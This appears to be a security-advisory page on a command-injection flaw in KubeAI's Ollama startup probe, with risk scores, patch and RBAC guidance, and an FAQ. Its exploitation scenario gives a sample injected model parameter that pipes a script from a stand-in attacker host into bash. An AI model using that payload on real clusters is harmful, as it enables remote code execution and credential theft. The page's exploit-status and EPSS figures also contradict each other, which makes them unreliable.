CVE-2026-34940 — HIGH (CVSS 8.8)

CISO Take

KubeAI's ollamaStartupProbeScript() function constructs bash commands using unsanitized model URL parameters (ref, modelParam), enabling OS command injection (CWE-78) that Kubernetes executes as a startup probe inside model server pods. Any principal with RBAC permissions to create or modify Model custom resources can run arbitrary commands in your LLM inference pods — potentially exposing model weights, API credentials, and internal cluster network access. While no public exploit exists and CISA KEV status is negative, this is a straightforward OS command injection requiring minimal skill once cluster-level access to Model CRDs is obtained. Upgrade to KubeAI 0.23.2 immediately; as interim mitigation, tightly restrict RBAC for the Model custom resource (create/update/patch verbs) to trusted operators only.

Sources: NVD GitHub Advisory ATLAS

What is the risk?

Effective risk is HIGH despite the absent CVSS score. CWE-78 OS command injection executed via bash -c inside Kubernetes pods is inherently critical when reachable. The attack surface is gated behind Kubernetes RBAC for Model custom resources, reducing external exposure but not insider or post-compromise threat actor risk. In multi-tenant clusters, over-permissive CI/CD service accounts, or environments where users can submit model definitions, this becomes trivially exploitable. RCE inside model serving pods directly threatens confidentiality of LLM inference infrastructure. Any automated pipeline that processes external model URLs into Model CRDs dramatically expands the blast radius.

Severity & Risk

CVSS 3.1

8.8 / 10

EPSS

0.0%

chance of exploitation in 30 days

Higher than 4% of all CVEs

Source: EPSS v3 — FIRST.org

Exploitation Status

Exploit Available

Exploitation: MEDIUM

Sophistication

Moderate

Exploitation Confidence

medium

○ CISA SSVC: Public PoC

Composite signal derived from CISA KEV, CISA SSVC, EPSS, trickest/cve, and Nuclei templates.

Attack Surface

AV Network

AC Low

PR Low

UI None

S Unchanged

C High

I High

A High

What should I do?

5 steps

PATCH

Upgrade KubeAI to 0.23.2 — the fix sanitizes model URL components before shell command construction.
RBAC AUDIT

Restrict Kubernetes RBAC on Model custom resources immediately — deny create/update/patch to all principals except trusted operators. Run: kubectl get rolebindings,clusterrolebindings -A -o json | grep -i model to surface over-permissive bindings.
REVIEW

Audit existing Model CRDs for suspicious injected values in ref/modelParam fields: kubectl get models -A -o yaml | grep -E '(ref|modelParam)' and inspect for shell metacharacters (;, |, $, backticks).
DETECT

Monitor model server pods for unexpected child processes spawned from startup probes using Falco or similar runtime security tools.
HARDEN

Apply Pod Security Standards (restricted profile) and NetworkPolicies to model serving namespaces to limit blast radius if exploitation occurs.

CISA SSVC Assessment

Decision Attend

Exploitation poc

Automatable No

Technical Impact total

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

Classification

Code Execution Inference Framework AML.T0012 - Valid Accounts AML.T0049 - Exploit Public-Facing Application AML.T0050 - Command and Scripting Interpreter

Compliance Impact

This CVE is relevant to:

EU AI Act

Article 9 - Risk management system

ISO 42001

A.9.1 - Security of AI systems

NIST AI RMF

MANAGE 2.2 - Risks associated with AI system components

OWASP LLM Top 10

LLM06:2025 - Excessive Agency

Frequently Asked Questions

What is CVE-2026-34940?

KubeAI's ollamaStartupProbeScript() function constructs bash commands using unsanitized model URL parameters (ref, modelParam), enabling OS command injection (CWE-78) that Kubernetes executes as a startup probe inside model server pods. Any principal with RBAC permissions to create or modify Model custom resources can run arbitrary commands in your LLM inference pods — potentially exposing model weights, API credentials, and internal cluster network access. While no public exploit exists and CISA KEV status is negative, this is a straightforward OS command injection requiring minimal skill once cluster-level access to Model CRDs is obtained. Upgrade to KubeAI 0.23.2 immediately; as interim mitigation, tightly restrict RBAC for the Model custom resource (create/update/patch verbs) to trusted operators only.

Is CVE-2026-34940 actively exploited?

No confirmed active exploitation of CVE-2026-34940 has been reported, but organizations should still patch proactively.

How to fix CVE-2026-34940?

1. PATCH: Upgrade KubeAI to 0.23.2 — the fix sanitizes model URL components before shell command construction. 2. RBAC AUDIT: Restrict Kubernetes RBAC on Model custom resources immediately — deny create/update/patch to all principals except trusted operators. Run: kubectl get rolebindings,clusterrolebindings -A -o json | grep -i model to surface over-permissive bindings. 3. REVIEW: Audit existing Model CRDs for suspicious injected values in ref/modelParam fields: kubectl get models -A -o yaml | grep -E '(ref|modelParam)' and inspect for shell metacharacters (;, |, $, backticks). 4. DETECT: Monitor model server pods for unexpected child processes spawned from startup probes using Falco or similar runtime security tools. 5. HARDEN: Apply Pod Security Standards (restricted profile) and NetworkPolicies to model serving namespaces to limit blast radius if exploitation occurs.

What systems are affected by CVE-2026-34940?

This vulnerability affects the following AI/ML architecture patterns: model serving, Kubernetes-based AI deployments, LLM inference infrastructure, MLOps pipelines.

What is the CVSS score for CVE-2026-34940?

CVE-2026-34940 has a CVSS v3.1 base score of 8.8 (HIGH). The EPSS exploitation probability is 0.02%.

Technical Details

NVD Description

KubeAI is an AI inference operator for kubernetes. Prior to 0.23.2, the ollamaStartupProbeScript() function in internal/modelcontroller/engine_ollama.go constructs a shell command string using fmt.Sprintf with unsanitized model URL components (ref, modelParam). This shell command is executed via bash -c as a Kubernetes startup probe. An attacker who can create or update Model custom resources can inject arbitrary shell commands that execute inside model server pods. This vulnerability is fixed in 0.23.2.

Exploitation Scenario

An attacker holding Kubernetes credentials that allow Model CRD updates — obtained via a compromised CI/CD service account, misconfigured RBAC, or insider access — crafts a Model resource with a malicious modelParam field such as 'llama3; curl http://attacker.com/implant.sh | bash; echo '. When KubeAI's controller processes this resource, ollamaStartupProbeScript() interpolates the unsanitized value into a bash -c command that Kubernetes executes as the pod startup probe. The injected commands run inside the model server container with the pod's service account privileges, enabling the attacker to exfiltrate Hugging Face tokens, cloud provider credentials, or model artifacts, pivot to other cluster services via the internal network, or establish persistence inside the inference infrastructure for long-term access.